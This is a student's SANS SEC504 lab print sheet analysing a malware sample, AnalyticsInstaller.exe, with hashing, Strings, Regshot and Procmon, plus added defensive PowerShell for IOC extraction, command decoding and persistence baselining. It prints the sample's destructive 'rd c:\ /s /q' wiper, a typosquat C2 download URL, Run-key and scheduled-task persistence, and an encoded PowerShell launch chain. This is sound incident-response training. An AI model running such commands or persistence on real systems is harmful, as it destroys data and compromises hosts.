SEC504 - Hacker Tools, Techniques, and Incident Handling | Printable command sheet
Lab 1.3 - Malware Analysis: AnalyticsInstaller.exe

Malware Analysis | SEC504 | May 2026

Triaged AnalyticsInstaller.exe with a static-then-dynamic workflow: hashed it with Get-FileHash (SHA256 D501EF28...), ran Sysinternals Strings to surface IOCs (www1-google-analytics.com:8088/analytics.exe, an HKCU Run key, a base64 -EncodedCommand PowerShell payload, and a destructive AnalyticsBackup.bat containing 'cmd.exe /c rd c:\ /s /q'), then detonated it under Regshot and Process Monitor. The Regshot diff caught a new Schedule\TaskCache\Tree\Analytics Backup key, Get-ScheduledTask confirmed the 'Analytics Backup' task, and Procmon's process tree showed the installer spawning cmd.exe → powershell.exe -ExecutionPolicy Bypass -EncodedCommand.

Tools: PowerShell, Get-FileHash, Sysinternals Strings, Regshot, Process Monitor (Procmon), Get-ScheduledTask

Commands

1. Hash the sample

Started with the cheapest, safest evidence: a file hash. Get-FileHash produced an MD5 (5524BDF546472FD66D3450C39CC4E2E5) and SHA256 (D501EF28D4C3F3C308461E5FB51929E3875395C38E6A885692C8788A3C376E45) of AnalyticsInstaller.exe. A hash is the single most portable IOC, ready to drop into VirusTotal, an EDR block list, or a SIEM watchlist before the binary is ever executed.

Get-FileHash -Algorithm MD5 AnalyticsInstaller.exe
Get-FileHash -Algorithm SHA256 AnalyticsInstaller.exe
-Algorithm MD5/SHA256: choose the digest
Default output: Algorithm, Hash, Path

2. Pull readable strings

Ran Sysinternals Strings (strings.exe -n 10) to dump ASCII and Unicode sequences of 10+ characters from the binary. Even without unpacking, the printable strings leaked the malware's intent in plain text: a C2 URL, a persistence path, and a base64 PowerShell blob.

C:\tools\Sysinternals\strings.exe -n 10 .\AnalyticsInstaller.exe
-n 10: minimum string length of 10 to cut noise
Strings dumps both ANSI and Unicode by default

3. Read the IOCs from the strings

The strings output was a confession. http://www1-google-analytics.com:8088/analytics.exe (a Google Analytics typosquat C2, the same disguise pattern seen in the RITA lab), C:\Windows\System32\analytics.exe (drop path), Software\Microsoft\Windows\CurrentVersion\Run with an 'Analytics Client' value (Run-key persistence), C:\Windows\System32\AnalyticsBackup.bat, a long powershell.exe -ExecutionPolicy Bypass -EncodedCommand JABt... blob, and cmd.exe /c start /max http://www.midnitemeerkats.com/note. Imported API names (RegOpenKeyExW, RegSetValueExW, RegCloseKey from ADVAPI32) confirmed the binary writes the registry itself.
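As an added example (not part of the lab and not the Sysinternals tool), the same 10-character ASCII and UTF-16LE extraction that strings.exe -n 10 performs, followed by a tagging pass for the IOC shapes this step surfaced. The sample bytes are constructed stand-ins for the binary, and the function and rule names are my own.

```powershell
# Added example (not from the lab): a minimal Strings-style scan in PowerShell
# that pulls 10+ character ASCII and UTF-16LE runs from a byte buffer and tags the
# IOC patterns seen in this lab (URLs, Run keys, -EncodedCommand, rd /s /q).
function Get-BinaryStrings {
    param(
        [Parameter(Mandatory)][byte[]]$Bytes,
        [int]$MinLength = 10          # same cut-off as strings.exe -n 10
    )
    # Latin-1 maps every byte to exactly one char, so the regex sees raw bytes
    $text    = [System.Text.Encoding]::GetEncoding(28591).GetString($Bytes)
    $ascii   = @([regex]::Matches($text, "[\x20-\x7E]{$MinLength,}") | ForEach-Object { $_.Value })
    # UTF-16LE text is a printable ASCII byte followed by a NUL byte, repeated
    $unicode = @([regex]::Matches($text, "(?:[\x20-\x7E]\x00){$MinLength,}") |
                 ForEach-Object { $_.Value -replace "`0", '' })
    $ascii + $unicode
}

function Get-IocHits {
    param([string[]]$Strings)
    # Patterns chosen from the artefacts this lab surfaced; extend as needed
    $rules = [ordered]@{
        'url'             = 'https?://[^\s"'']+'
        'run-key'         = 'CurrentVersion\\Run\b'
        'encoded-command' = '-EncodedCommand\s+[A-Za-z0-9+/=]{16,}'
        'wiper'           = '\brd\s+[a-z]:\\\s+/s\s+/q'
    }
    foreach ($s in $Strings) {
        foreach ($r in $rules.GetEnumerator()) {
            if ($s -match $r.Value) { [pscustomobject]@{ Type = $r.Key; Value = $s } }
        }
    }
}

# Constructed sample bytes standing in for the binary (NOT the real sample):
# an ASCII URL, a UTF-16LE Run-key path and a short run that must be dropped.
$sample = [byte[]]@(0x90, 0x4D, 0x5A) +
          [System.Text.Encoding]::ASCII.GetBytes('http://example.invalid:8088/payload.exe') +
          [byte[]]@(0x00, 0x01) +
          [System.Text.Encoding]::Unicode.GetBytes('Software\Microsoft\Windows\CurrentVersion\Run') +
          [System.Text.Encoding]::ASCII.GetBytes('short')

Get-IocHits -Strings (Get-BinaryStrings -Bytes $sample) | Format-Table -AutoSize
# Against a real file: Get-IocHits -Strings (Get-BinaryStrings ([IO.File]::ReadAllBytes('.\sample.exe')))
```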

4. Regshot first shot

Switched to dynamic analysis. Regshot takes a full snapshot of the registry (and optionally the filesystem) so changes can be diffed after detonation. Configured it to scan C:\WINDOWS, output to the user profile, then captured the '1st shot' baseline: 395,525 keys and 676,926 values.

5. Detonate and confirm the scheduled task

Ran AnalyticsInstaller.exe in the isolated VM, then immediately checked for a dropped scheduled task with Get-ScheduledTask. A new task appeared: TaskName 'Analytics Backup', State Ready. Scheduled tasks are a top-tier persistence and execution mechanism precisely because they survive reboots and run on a trigger.

.\AnalyticsInstaller.exe
Get-ScheduledTask

6. Regshot second shot

Took the Regshot '2nd shot' after detonation (67,014 keys / 77,922 values in the changed scope) so Regshot could diff the two snapshots. The before/after diff is what turns 'something changed' into a precise list of exactly which keys and values the malware touched.

7. Compare the snapshots

Ran the Regshot comparison. The engine walked both snapshots and produced a diff report while the green progress bar ran. Comparing 395K-key baselines against the post-detonation state is exactly the kind of mechanical, high-coverage work that a human could never do by eye.

8. Read the Regshot diff report

Opened the ~res-x64.txt diff. Keys added: 7, including the smoking gun HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Analytics Backup, alongside the matching Plain and Tasks TaskCache GUID entries. This is the registry footprint of the 'Analytics Backup' scheduled task, confirmed independently of Get-ScheduledTask. The report also lists deleted keys/values from normal Windows churn (WER TermReason entries) that a responder learns to ignore.

9. Read the dropped batch payload

Used Get-Content to read the dropped C:\Windows\SysWOW64\AnalyticsBackup.bat (the strings name C:\Windows\System32, but a 32-bit installer's writes to System32 are redirected to SysWOW64 by WOW64 file system redirection, which is also why cmd.exe launches from SysWOW64 in step 13). Its entire contents: cmd.exe /c rd c:\ /s /q. That is a destructive wiper: a recursive (/s), unprompted (/q) deletion of the C: drive. Naming a drive-wipe 'AnalyticsBackup' and scheduling it as 'Analytics Backup' is deliberate camouflage so a skimming defender reads 'backup' and moves on.

Get-Content C:\Windows\SysWOW64\AnalyticsBackup.bat

10. Filter Process Monitor

Launched Sysinternals Process Monitor and set a filter: Process Name is AnalyticsInstaller.exe → Include, with the usual analysis-tool noise (Procmon, Procexp, Autoruns, System) excluded. Filtering before detonation keeps the capture focused on the malware's own activity instead of the thousands of events Windows generates per second.

11. Re-detonate under Procmon

Re-ran AnalyticsInstaller.exe with Process Monitor capturing. The filtered event stream records every file, registry, process, and network operation the binary performs, in order, with full detail.

.\AnalyticsInstaller.exe

12. Find the Process Create event

Used Procmon's Find (Ctrl+F) for 'Process Create' to jump straight to the moment the malware spawned a child process, skipping past the file and registry operations to the execution event that matters most.

13. Read the encoded PowerShell command line

The Process Create event properties revealed the child: C:\WINDOWS\SysWOW64\cmd.exe launching cmd.exe /c powershell.exe -ExecutionPolicy Bypass -EncodedCommand AEkAZgBHAG8... The -EncodedCommand flag takes a base64 string (of the UTF-16LE script text) so the real script never appears in plaintext on the command line, and -ExecutionPolicy Bypass sidesteps script restrictions for that process. This is the runtime confirmation of the encoded blob seen statically in the strings.
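Added example (not from the lab): decoding the -EncodedCommand argument out of a command line captured the way Procmon shows it, for triage or for a detection pipeline fed by process-creation events. The command line below is constructed around a benign script, not the lab's AEkAZgBHAG8... blob, and the function name is my own.

```powershell
# Added example (not from the lab): recover the script hidden behind
# powershell.exe -EncodedCommand from a recorded process command line.
function Get-DecodedPowerShellCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    # powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc, ...).
    # '-e' followed by 'x' is excluded so -ExecutionPolicy is never mistaken for it.
    $m = [regex]::Match($CommandLine, '(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)')
    if (-not $m.Success) { return $null }
    $b64 = $m.Groups[1].Value
    try {
        $bytes = [Convert]::FromBase64String($b64)
    } catch {
        # Truncated or altered blobs (e.g. 'JABt...' copied from a report) land here
        return [pscustomobject]@{ Encoded = $b64; Decoded = $null; Error = 'invalid base64' }
    }
    # -EncodedCommand carries UTF-16LE, not UTF-8; decoding with the wrong encoding gives garbage
    [pscustomobject]@{
        Encoded = $b64
        Decoded = [System.Text.Encoding]::Unicode.GetString($bytes)
        Error   = $null
    }
}

# Constructed command line in the shape of the Procmon Process Create event; the
# embedded script is benign and only stands in for the real payload.
$script = 'Write-Output "constructed sample, not the lab payload"'
$blob   = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($script))
$line   = "cmd.exe /c powershell.exe -ExecutionPolicy Bypass -EncodedCommand $blob"
Get-DecodedPowerShellCommand -CommandLine $line | Format-List
```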

14. Reconstruct the process tree

Opened Procmon's Process Tree to see the full lineage: AnalyticsInstaller.exe (PID 5804), launched by powershell.exe under Explorer, started and exited within ~21 seconds. The tree ties the binary, its parent shell, and its short-lived execution window together into one picture, which is exactly what an IR timeline needs.

Key Findings

  • SHA256 D501EF28D4C3F3C308461E5FB51929E3875395C38E6A885692C8788A3C376E45 (MD5 5524BDF546472FD66D3450C39CC4E2E5)
  • C2 / payload URL: http://www1-google-analytics.com:8088/analytics.exe (Google Analytics typosquat)
  • Persistence: HKCU/HKLM ...\CurrentVersion\Run 'Analytics Client' and an 'Analytics Backup' scheduled task
  • Dropped wiper: AnalyticsBackup.bat containing cmd.exe /c rd c:\ /s /q
  • Runtime: AnalyticsInstaller.exe → cmd.exe → powershell.exe -ExecutionPolicy Bypass -EncodedCommand

Security Controls

  • Application control / WDAC to block unsigned binaries from user-writable paths
  • PowerShell script-block logging and transcription to capture decoded -EncodedCommand content
  • Scheduled-task and Run-key baselining with alerting on new entries
  • EDR detonation/behavioral detection for cmd.exe → powershell.exe -EncodedCommand chains
  • Egress filtering and DNS monitoring for typosquatted analytics domains
  • Tamper-resistant, offline backups to survive a destructive 'rd c:\ /s /q' payload
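Added example (not from the lab and not Regshot): a lightweight before/after diff of the two persistence surfaces this sample used, scheduled tasks (step 5) and Run keys, which is the baselining control listed above. It uses only built-in cmdlets and registry paths; the function names and the baseline.json file name are my own.

```powershell
# Added example (not from the lab): a Regshot-style '1st shot' / '2nd shot' diff
# limited to scheduled tasks and Run keys. Take a baseline on a clean host, snapshot
# again after detonation (or on a schedule) and alert on anything added or modified.
function Get-PersistenceSnapshot {
    $items = @()
    # Scheduled tasks: TaskPath + TaskName is the stable identity; Actions show what runs
    foreach ($t in Get-ScheduledTask) {
        $items += [pscustomobject]@{
            Kind  = 'ScheduledTask'
            Key   = "$($t.TaskPath)$($t.TaskName)"
            Value = ($t.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; '
        }
    }
    # Run keys for the current user and the machine (the persistence seen in the strings)
    foreach ($hive in 'HKCU:', 'HKLM:') {
        $path = "$hive\Software\Microsoft\Windows\CurrentVersion\Run"
        if (-not (Test-Path $path)) { continue }
        $props = Get-ItemProperty -Path $path
        foreach ($p in $props.PSObject.Properties |
                 Where-Object { $_.Name -notin 'PSPath','PSParentPath','PSChildName','PSDrive','PSProvider' }) {
            $items += [pscustomobject]@{ Kind = 'RunKey'; Key = "$path\$($p.Name)"; Value = $p.Value }
        }
    }
    $items
}

function Compare-PersistenceSnapshot {
    param([Parameter(Mandatory)][object[]]$Baseline, [Parameter(Mandatory)][object[]]$Current)
    $known = @{}
    foreach ($b in $Baseline) { $known["$($b.Kind)|$($b.Key)"] = $b.Value }
    foreach ($c in $Current) {
        $id = "$($c.Kind)|$($c.Key)"
        if (-not $known.ContainsKey($id)) {
            [pscustomobject]@{ Change = 'Added';    Kind = $c.Kind; Key = $c.Key; Value = $c.Value }
        } elseif ($known[$id] -ne $c.Value) {
            [pscustomobject]@{ Change = 'Modified'; Kind = $c.Kind; Key = $c.Key; Value = $c.Value }
        }
    }
}

# Usage: '1st shot' before detonation, '2nd shot' after, then compare (mirrors the Regshot steps)
# Get-PersistenceSnapshot | ConvertTo-Json -Depth 3 | Set-Content .\baseline.json
# $baseline = Get-Content .\baseline.json -Raw | ConvertFrom-Json
# Compare-PersistenceSnapshot -Baseline $baseline -Current (Get-PersistenceSnapshot) | Format-Table -AutoSize
```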
Lab Print Sheet | Luis Javier Lozoya